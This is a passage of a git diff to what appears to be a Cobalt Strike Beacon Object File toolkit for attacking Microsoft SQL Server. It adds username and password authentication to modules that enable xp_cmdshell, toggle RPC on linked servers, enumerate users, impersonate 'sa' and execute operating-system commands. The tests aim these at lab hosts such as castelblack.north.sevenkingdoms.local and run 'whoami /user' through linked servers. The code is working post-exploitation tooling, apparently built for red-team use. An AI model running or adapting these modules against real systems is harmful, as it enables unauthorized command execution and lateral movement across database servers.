char* link, char* impersonate, char* module, char* value) +void ToggleGenericModule(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* module, char* value) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLHDBC dbc = NULL; - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { goto END; @@ -110,6 +110,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -123,6 +125,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -130,6 +134,8 @@ VOID go( value = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -148,7 +154,7 @@ VOID go( printoutput(TRUE); return; } - ToggleRpc(server, database, link, impersonate, value); + ToggleRpc(server, user, password, database, link, impersonate, value); } // we're toggling one of the other modules that we treat the same else @@ -158,7 +164,7 @@ VOID go( return; } - ToggleGenericModule(server, database, link, impersonate, module, value); + ToggleGenericModule(server, user, password, database, link, impersonate, module, value); } @@ -170,28 +176,28 @@ VOID go( int main() { internal_printf("============ LINK RPC DISABLE TEST ============\n\n"); - ToggleRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "FALSE"); + ToggleRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "FALSE"); internal_printf("\n\n============ LINK RPC ENABLE TEST ============\n\n"); - ToggleRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "TRUE"); + ToggleRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "TRUE"); internal_printf("\n\n============ BASE XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "xp_cmdshell", "0"); internal_printf("\n\n============ BASE XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "xp_cmdshell", "1"); internal_printf("\n\n============ IMPERSONATE XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "xp_cmdshell", "0"); internal_printf("\n\n============ IMPERSONATE XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "xp_cmdshell", "1"); internal_printf("\n\n============ LINK XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "xp_cmdshell", "0"); internal_printf("\n\n============ LINK XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "xp_cmdshell", "1"); } #endif diff --git a/src/SQL/users/entry.c b/src/SQL/users/entry.c index 5cd8b32..8858ad9 100644 --- a/src/SQL/users/entry.c +++ b/src/SQL/users/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckUsers(char* server, char* database, char* link, char* impersonate) +void CheckUsers(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckUsers(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -83,6 +83,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -94,11 +96,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -113,7 +119,7 @@ VOID go( return; } - CheckUsers(server, database, link, impersonate); + CheckUsers(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -123,13 +129,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/whoami/entry.c b/src/SQL/whoami/entry.c index 1a657bb..3a4a9b5 100644 --- a/src/SQL/whoami/entry.c +++ b/src/SQL/whoami/entry.c @@ -21,7 +21,7 @@ void PrintMemberStatus(char* roleName, char* status) } } -void Whoami(char* server, char* database, char* link, char* impersonate) +void Whoami(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -47,11 +47,11 @@ void Whoami(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) @@ -196,10 +196,9 @@ VOID go( IN ULONG Length ) { - // - // usage: whoami - // char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -211,11 +210,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -230,7 +233,7 @@ VOID go( return; } - Whoami(server, database, link, impersonate); + Whoami(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -240,13 +243,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n============ IMPERSONATE TEST ============\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n============ LINK TEST ====\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/xpcmd/entry.c b/src/SQL/xpcmd/entry.c index 5e9c324..5b39159 100644 --- a/src/SQL/xpcmd/entry.c +++ b/src/SQL/xpcmd/entry.c @@ -4,7 +4,7 @@ #include "sql_modules.c" -void ExecuteXpCmd(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteXpCmd(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -17,11 +17,11 @@ void ExecuteXpCmd(char* server, char* database, char* link, char* impersonate, c if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -160,6 +160,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -172,12 +174,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -192,7 +198,7 @@ VOID go( return; } - ExecuteXpCmd(server, database, link, impersonate, command); + ExecuteXpCmd(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; @@ -202,13 +208,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "whoami /user"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "whoami /user"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "whoami /user"); } #endif diff --git a/src/common/bofdefs.h b/src/common/bofdefs.h index e40a59d..d61ab71 100755 --- a/src/common/bofdefs.h +++ b/src/common/bofdefs.h @@ -57,6 +57,7 @@ DECLSPEC_IMPORT char * __cdecl MSVCRT$strncat(char * __restrict__ _Dest,const ch DECLSPEC_IMPORT char * __cdecl MSVCRT$strncpy(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count); WINBASEAPI time_t __cdecl MSVCRT$time(time_t *_Time); WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg); +WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ d,size_t n,const char * __restrict__ format, ...); DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src); #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) @@ -122,6 +123,7 @@ WINBASEAPI int STDCALL WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSA #define MSVCRT$strncpy strncpy #define MSVCRT$time time #define MSVCRT$vsnprintf vsnprintf +#define MSVCRT$_snprintf _snprintf #define MSVCRT$strcpy strcpy // ODBC32 diff --git a/src/common/sql.c b/src/common/sql.c index 330d29b..9424ad8 100644 --- a/src/common/sql.c +++ b/src/common/sql.c @@ -401,10 +401,11 @@ BOOL PrintQueryResults(SQLHSTMT stmt, BOOL hasHeader) // // connects to a SQL server // -SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* dbName) +SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* user, char* password, char* dbName) { SQLRETURN ret; SQLCHAR connstr[1024]; + size_t totalSize = sizeof(connstr); SQLHDBC dbc = NULL; // @@ -437,18 +438,29 @@ SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* dbName) return NULL; } + MSVCRT$_snprintf((char*)connstr, totalSize - 1, "DRIVER={SQL Server};SERVER=%s;", server); + // // dbName may be NULL when a linked server is used // - if (dbName == NULL) + if (dbName != NULL) { - MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s;Trusted_Connection=Yes;", server); + size_t len = MSVCRT$strlen(connstr); + MSVCRT$_snprintf((char*)connstr + len, totalSize - len - 1, "DATABASE=%s;", dbName); + } + + // + // if no user was specified, use Windows authentication + // + if (user == NULL) + { + MSVCRT$strncat((char*)connstr, "Trusted_Connection=Yes;", totalSize - MSVCRT$strlen(connstr) - 1); } else { - MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s;DATABASE=%s;Trusted_Connection=Yes;", server, dbName); + size_t len = MSVCRT$strlen(connstr); + MSVCRT$_snprintf((char*)connstr + len, totalSize - len - 1, "UID=%s;PWD=%s;", user, password ? password : ""); } - // // connect to the sql server